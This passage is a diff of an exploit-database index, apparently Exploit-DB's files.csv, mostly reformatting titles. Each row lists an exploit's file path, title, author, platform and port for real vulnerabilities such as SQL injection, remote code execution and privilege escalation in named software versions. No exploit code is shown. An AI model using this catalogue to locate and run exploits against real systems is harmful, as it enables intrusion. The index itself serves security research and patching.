- Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 +35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 - Pre-Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443 35151,platforms/hardware/remote/35151.rb,"Xerox Multifunction Printers (MFP) - 'Patch' DLM",2014-11-03,Metasploit,hardware,remote,9100 35153,platforms/osx/dos/35153.c,"Mac OS X Mavericks - IOBluetoothHCIUserClient Privilege Escalation",2014-11-03,"rpaleari and joystick",osx,dos,0 35154,platforms/asp/dos/35154.txt,"Sigma Portal - 'ShowObjectPicture.aspx' Denial of Service",2010-12-27,"Pouya Daneshmand",asp,dos,0 @@ -31795,13 +31790,13 @@ id,file,description,date,author,platform,type,port 35279,platforms/osx/dos/35279.html,"Safari 8.0 / OS X 10.10 - Crash PoC",2014-11-17,w3bd3vil,osx,dos,0 35280,platforms/windows/remote/35280.txt,".NET Remoting Services - Remote Command Execution",2014-11-17,"James Forshaw",windows,remote,0 35294,platforms/php/webapps/35294.txt,"Joomla! 'com_clan_members' Component - 'id' Parameter SQL Injection",2011-02-01,FL0RiX,php,webapps,0 -35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,Metasploit,android,remote,0 -35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection",2014-11-18,Metasploit,php,remote,80 +35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser - RCE",2014-11-18,Metasploit,android,remote,0 +35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin - PHP Code Injection",2014-11-18,Metasploit,php,remote,80 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - CSRF Add Admin Exploit",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack DoS",2014-11-19,nitr0us,linux,dos,31337 35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 - Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 -35304,platforms/multiple/dos/35304.txt,"Oracle Java Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 +35304,platforms/multiple/dos/35304.txt,"Oracle Java - Floating-Point Value Denial of Service",2011-02-01,"Konstantin Preisser",multiple,dos,0 35305,platforms/php/webapps/35305.txt,"ACollab - 't' Parameter SQL Injection",2011-02-01,"AutoSec Tools",php,webapps,0 35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Parameter Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps,0 35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection",2011-01-31,"AutoSec Tools",php,webapps,0 @@ -31814,7 +31809,7 @@ id,file,description,date,author,platform,type,port 35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Inclusion",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35314,platforms/linux/remote/35314.txt,"Wireshark 1.4.3 - (.pcap) Memory Corruption",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' Parameter SQL Injection",2011-02-07,NoNameMT,php,webapps,0 -35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0 +35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management - Authentication Bypass",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0 35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products - Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0 35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 - 'dagc.dll' DLL Loading Arbitrary Code Execution",2011-02-07,d3c0der,windows,remote,0 35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection",2011-02-08,"High-Tech Bridge SA",php,webapps,0 @@ -31854,17 +31849,17 @@ id,file,description,date,author,platform,type,port 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection",2011-02-16,"Jimmy Bandit",multiple,remote,0 35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 - 'admin/upload-ajax.php' Remote Arbitrary File Upload",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 35354,platforms/php/dos/35354.txt,"PHP 5.3.5 - 'grapheme_extract()' NULL Pointer Dereference Denial Of Service",2011-02-17,"Maksymilian Arciemowicz",php,dos,0 -35356,platforms/linux/remote/35356.rb,"Hikvision DVR RTSP Request Remote Code Execution",2014-11-24,Metasploit,linux,remote,554 +35356,platforms/linux/remote/35356.rb,"Hikvision DVR - RTSP Request Remote Code Execution",2014-11-24,Metasploit,linux,remote,554 35357,platforms/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 35358,platforms/php/dos/35358.txt,"PHP 5.5.12 - Locale::parseLocale Memory Corruption",2014-11-24,"John Leitch",php,dos,0 -35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 +35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 - Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35361,platforms/php/webapps/35361.txt,"Escort Directory CMS - SQL Injection",2011-02-19,NoNameMT,php,webapps,0 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN - (UltraCamX.ocx) Stack BoF",2014-11-25,LiquidWorm,windows,dos,0 -35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0 +35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime - stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0 35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 - (dosearch.php words_exact param) SQL Injection",2014-11-25,bard,php,webapps,80 -35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0 +35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime - stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0 35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 - Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0 35370,platforms/linux/local/35370.c,"Linux Kernel 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit",2014-11-25,"Kaiqu Chen",linux,local,0 @@ -31928,14 +31923,14 @@ id,file,description,date,author,platform,type,port 35434,platforms/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",windows,remote,0 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0 -35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 +35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite - HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 35438,platforms/cgi/webapps/35438.txt,"CosmoShop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - XSS",2014-12-02,"Kacper Szurek",php,webapps,80 35440,platforms/osx/local/35440.rb,"Mac OS X - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 35441,platforms/multiple/remote/35441.rb,"Tincd - Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0 35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 -35444,platforms/php/webapps/35444.txt,"Lms Web Ensino Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 +35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service",2011-01-03,"Serge Dubrouski",linux,dos,0 35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 - (.avi) Remote Buffer Overflow",2011-03-10,KedAns-Dz,windows,remote,0 35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 @@ -31958,11 +31953,11 @@ id,file,description,date,author,platform,type,port 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 35465,platforms/multiple/dos/35465.pl,"VLC Media Player 1.0.5 - (.ape) Denial of Service",2011-03-15,KedAns-Dz,multiple,dos,0 35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0 -35467,platforms/php/webapps/35467.txt,"SugarCRM 6.1.1 Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 +35467,platforms/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0 35468,platforms/windows/remote/35468.pl,"Monkey's Audio - (.ape) Buffer Overflow",2011-03-16,KedAns-Dz,windows,remote,0 35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 - Cross-Site Scripting / HTML Injection",2011-03-10,"AutoSec Tools",php,webapps,0 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS - 'page_info.php' SQL Injection",2011-03-16,H3X,php,webapps,0 -35472,platforms/lin_x86-64/local/35472.txt,"Offset2lib: Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",lin_x86-64,local,0 +35472,platforms/lin_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",lin_x86-64,local,0 35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 @@ -32016,7 +32011,7 @@ id,file,description,date,author,platform,type,port 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion",2011-03-29,"AutoSec Tools",php,webapps,0 35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",php,webapps,0 -35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross-Site Scripting",2011-03-29,"Mesut Timur",php,webapps,0 +35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 - URI Cross-Site Scripting",2011-03-29,"Mesut Timur",php,webapps,0 35524,platforms/php/webapps/35524.txt,"XOOPS - 'view_photos.php' Cross-Site Scripting",2011-03-29,KedAns-Dz,php,webapps,0 35525,platforms/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Parameter Multiple SQL Injection",2011-03-30,"kurdish hackers team",php,webapps,0 35526,platforms/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 @@ -32081,7 +32076,7 @@ id,file,description,date,author,platform,type,port 35603,platforms/php/webapps/35603.txt,"Wordpress Live Wire 2.3.1 Theme - Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 35604,platforms/php/webapps/35604.txt,"eForum 1.1 - '/eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 -35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 +35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local File Inclusion / Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"WordPress The Gazette Edition 2.9.4 Theme - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 @@ -32117,7 +32112,7 @@ id,file,description,date,author,platform,type,port 35641,platforms/multiple/remote/35641.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/MafletClose.mafService RENDER_MAFLET Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35642,platforms/multiple/remote/35642.txt,"Oracle JD Edwards EnterpriseOne 8.9x Tools Web Runtime SEC - /jde/JASMafletMafBrowserClose.mafService jdemafjasLinkTarget Parameter XSS",2011-04-19,"Juan Manuel Garcia",multiple,remote,0 35643,platforms/php/webapps/35643.txt,"webSPELL 4.2.2a - Multiple Cross-Site Scripting Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 -35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 Stored XSS",2014-12-31,"Halil Dalabasmaz",php,webapps,80 +35659,platforms/php/webapps/35659.txt,"Social Microblogging PRO 1.5 - Stored XSS",2014-12-31,"Halil Dalabasmaz",php,webapps,80 35644,platforms/linux/remote/35644.txt,"Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities",2011-04-19,QSecure,linux,remote,0 35645,platforms/php/webapps/35645.txt,"Automagick Tube Script 1.4.4 - 'module' Parameter Cross-Site Scripting",2011-04-20,Kurd-Team,php,webapps,0 35647,platforms/php/webapps/35647.txt,"SyCtel Design - 'menu' Parameter Multiple Local File Inclusion",2011-04-21,"Ashiyane Digital Security Team",php,webapps,0 @@ -32142,8 +32137,8 @@ id,file,description,date,author,platform,type,port 35667,platforms/php/webapps/35667.txt,"Joostina - Multiple Components SQL Injection",2011-04-27,KedAns-Dz,php,webapps,0 35668,platforms/php/webapps/35668.txt,"up.time Software 5 - Administration Interface Remote Authentication Bypass",2011-04-27,"James Burton",php,webapps,0 35670,platforms/php/webapps/35670.txt,"Absolut Engine 1.73 - Multiple Vulnerabilities",2015-01-01,"Steffen Rösemann",php,webapps,80 -35671,platforms/windows/local/35671.rb,"i-FTP Schedule Buffer Overflow",2015-01-01,Metasploit,windows,local,0 -35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps,0 +35671,platforms/windows/local/35671.rb,"i-FTP Schedule - Buffer Overflow",2015-01-01,Metasploit,windows,local,0 +35677,platforms/php/webapps/35677.txt,"eyeOS 1.9.0.2 - Image File Handling HTML Injection",2011-04-25,"Alberto Ortega",php,webapps,0 35678,platforms/php/webapps/35678.txt,"phpGraphy 0.9.13 b - 'theme_dir' Parameter Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps,0 35679,platforms/php/webapps/35679.txt,"e107 2 Bootstrap CMS - XSS",2015-01-03,"Ahmet Agar / 0x97",php,webapps,0 35680,platforms/php/webapps/35680.txt,"ClanSphere 2011.0 - Local File Inclusion / Arbitrary File Upload",2011-04-28,KedAns-Dz,php,webapps,0 @@ -32165,7 +32160,7 @@ id,file,description,date,author,platform,type,port 35712,platforms/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow",2015-01-06,Metasploit,windows,local,0 35701,platforms/php/webapps/35701.txt,"SelectaPix 1.4.1 - 'uploadername' Parameter Cross-Site Scripting",2011-05-03,"High-Tech Bridge SA",php,webapps,0 35702,platforms/php/webapps/35702.txt,"Multiple GoT.MY Products - 'theme_dir' Parameter Cross-Site Scripting",2011-05-03,Hector.x90,php,webapps,0 -35703,platforms/multiple/remote/35703.py,"sipdroid 2.2 SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 +35703,platforms/multiple/remote/35703.py,"sipdroid 2.2 - SIP INVITE Response User Enumeration Weakness",2011-05-04,"Anibal Vaz Marques",multiple,remote,0 35704,platforms/php/webapps/35704.txt,"WP Ajax Calendar 1.0 - 'example.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35705,platforms/php/webapps/35705.txt,"PHP Directory Listing Script 3.1 - 'index.php' Cross-Site Scripting",2011-05-05,"High-Tech Bridge SA",php,webapps,0 35706,platforms/jsp/webapps/35706.txt,"BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities",2011-05-05,"Richard Brain",jsp,webapps,0 @@ -32213,7 +32208,7 @@ id,file,description,date,author,platform,type,port 35750,platforms/hardware/webapps/35750.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit DnsProxy.cmd",2015-01-11,"XLabs Security",hardware,webapps,0 35751,platforms/hardware/webapps/35751.pl,"D-Link DSL-2730B Modem - XSS Injection Stored Exploit Lancfg2get.cgi",2015-01-11,"XLabs Security",hardware,webapps,0 35752,platforms/php/webapps/35752.txt,"Mambo - 'com_docman' 1.3.0 Component Multiple SQL Injection",2011-05-16,KedAns-Dz,php,webapps,0 -35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon Denial Of Service",2011-05-16,Knud,multiple,dos,0 +35753,platforms/multiple/dos/35753.pl,"Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial Of Service",2011-05-16,Knud,multiple,dos,0 35754,platforms/php/webapps/35754.txt,"allocPSA 1.7.4 - 'login/login.php' Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 35755,platforms/php/webapps/35755.txt,"DocMGR 1.1.2 - 'history.php' Cross-Site Scripting",2011-05-12,"AutoSec Tools",php,webapps,0 35756,platforms/php/webapps/35756.txt,"openQRM 4.8 - 'source_tab' Parameter Cross-Site Scripting",2011-05-16,"AutoSec Tools",php,webapps,0 @@ -32240,11 +32235,11 @@ id,file,description,date,author,platform,type,port 35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Plugin - Shell Upload",2015-01-13,Metasploit,php,remote,80 35779,platforms/hardware/remote/35779.txt,"CiscoWorks Common Services Framework 3.1.1 Help Servlet - Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 35780,platforms/hardware/remote/35780.txt,"Cisco Unified Operations Manager 8.5 - Common Services Device Center Cross-Site Scripting",2011-05-18,"Sense of Security",hardware,remote,0 -35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 +35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0 35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0 35783,platforms/php/webapps/35783.html,"Andy's PHP Knowledgebase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0 35784,platforms/linux/remote/35784.php,"Zend Framework 1.11.4 - 'PDO_MySql' Security Bypass",2011-05-19,"Anthony Ferrara",linux,remote,0 -35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0 +35785,platforms/linux/remote/35785.txt,"klibc 1.5.2 - DHCP Options Processing Remote Shell Command Execution",2011-05-18,"maximilian attems",linux,remote,0 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0 35788,platforms/php/webapps/35788.txt,"Joomla! 'com_maplocator' Component - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0 @@ -32258,9 +32253,9 @@ id,file,description,date,author,platform,type,port 35796,platforms/php/webapps/35796.txt,"MidiCMS Website Builder - Local File Inclusion / Arbitrary File Upload",2011-05-25,KedAns-Dz,php,webapps,0 35797,platforms/php/webapps/35797.txt,"Joomla! 'com_shop' Component - SQL Injection",2011-05-25,"ThunDEr HeaD",php,webapps,0 35798,platforms/php/webapps/35798.txt,"Kryn.cms 0.9 - '_kurl' Parameter Cross-Site Scripting",2011-05-25,"AutoSec Tools",php,webapps,0 -35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0 -35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0 -35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4 1 SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0 +35799,platforms/linux/remote/35799.txt,"Vordel Gateway 6.0.3 - Directory Traversal",2011-05-25,"Brian W. Gary",linux,remote,0 +35800,platforms/hardware/remote/35800.txt,"RXS-3211 IP Camera - UDP Packet Password Information Disclosure",2011-05-25,"Spare Clock Cycles",hardware,remote,0 +35801,platforms/linux/remote/35801.txt,"Asterisk 1.8.4.1 - SIP 'REGISTER' Request User Enumeration Weakness",2011-05-26,"Francesco Tornieri",linux,remote,0 35802,platforms/cgi/webapps/35802.txt,"Blackboard Learn 8.0 - 'keywordraw' Parameter Cross-Site Scripting",2011-05-25,"Matt Jezorek",cgi,webapps,0 35805,platforms/multiple/remote/35805.txt,"Gadu-Gadu 10.5 - Remote Code Execution",2011-05-28,"Kacper Szczesniak",multiple,remote,0 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0 @@ -32274,7 +32269,7 @@ id,file,description,date,author,platform,type,port 35814,platforms/php/webapps/35814.txt,"TEDE Simplificado 1.01/S2.04 - Multiple SQL Injection",2011-06-01,KnocKout,php,webapps,0 35815,platforms/php/webapps/35815.pl,"PikaCMS - Multiple Local File Disclosure Vulnerabilities",2011-06-01,KnocKout,php,webapps,0 35816,platforms/php/webapps/35816.txt,"ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection",2011-06-01,"High-Tech Bridge SA",php,webapps,0 -35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 +35817,platforms/hardware/remote/35817.txt,"NetGear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 - 'range' Parameter SQL Injection",2011-06-02,"Gjoko Krstic",php,webapps,0 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x - KSM Local Denial of Service",2011-06-02,"Andrea Righi",linux,dos,0 @@ -32305,12 +32300,12 @@ id,file,description,date,author,platform,type,port 35994,platforms/windows/local/35994.c,"BullGuard Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 -35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 +35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 -35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 -35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 +35848,platforms/osx/local/35848.c,"OS X 10.9.5 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 +35849,platforms/osx/dos/35849.c,"OS X 10.10 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 35850,platforms/windows/local/35850.bat,"Microsoft Windows XP - 'tskill' Local Privilege Escalation",2011-06-13,"Todor Donev",windows,local,0 35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0 35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0 @@ -32333,7 +32328,7 @@ id,file,description,date,author,platform,type,port 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos,0 35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0 35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 -35872,platforms/asp/webapps/35872.txt,"H3C ER5100 Authentication Bypass",2011-06-22,128bit,asp,webapps,0 +35872,platforms/asp/webapps/35872.txt,"H3C ER5100 - Authentication Bypass",2011-06-22,128bit,asp,webapps,0 35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service",2011-06-17,rouli,windows,dos,0 35874,platforms/php/webapps/35874.txt,"Eshop Manager - Multiple SQL Injection",2011-06-22,"Number 7",php,webapps,0 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 @@ -32356,7 +32351,7 @@ id,file,description,date,author,platform,type,port 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 - SQL Injection",2011-06-27,"Qihan Luo",multiple,remote,0 35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injection",2011-06-27,MaKyOtOx,php,webapps,0 35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 -35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 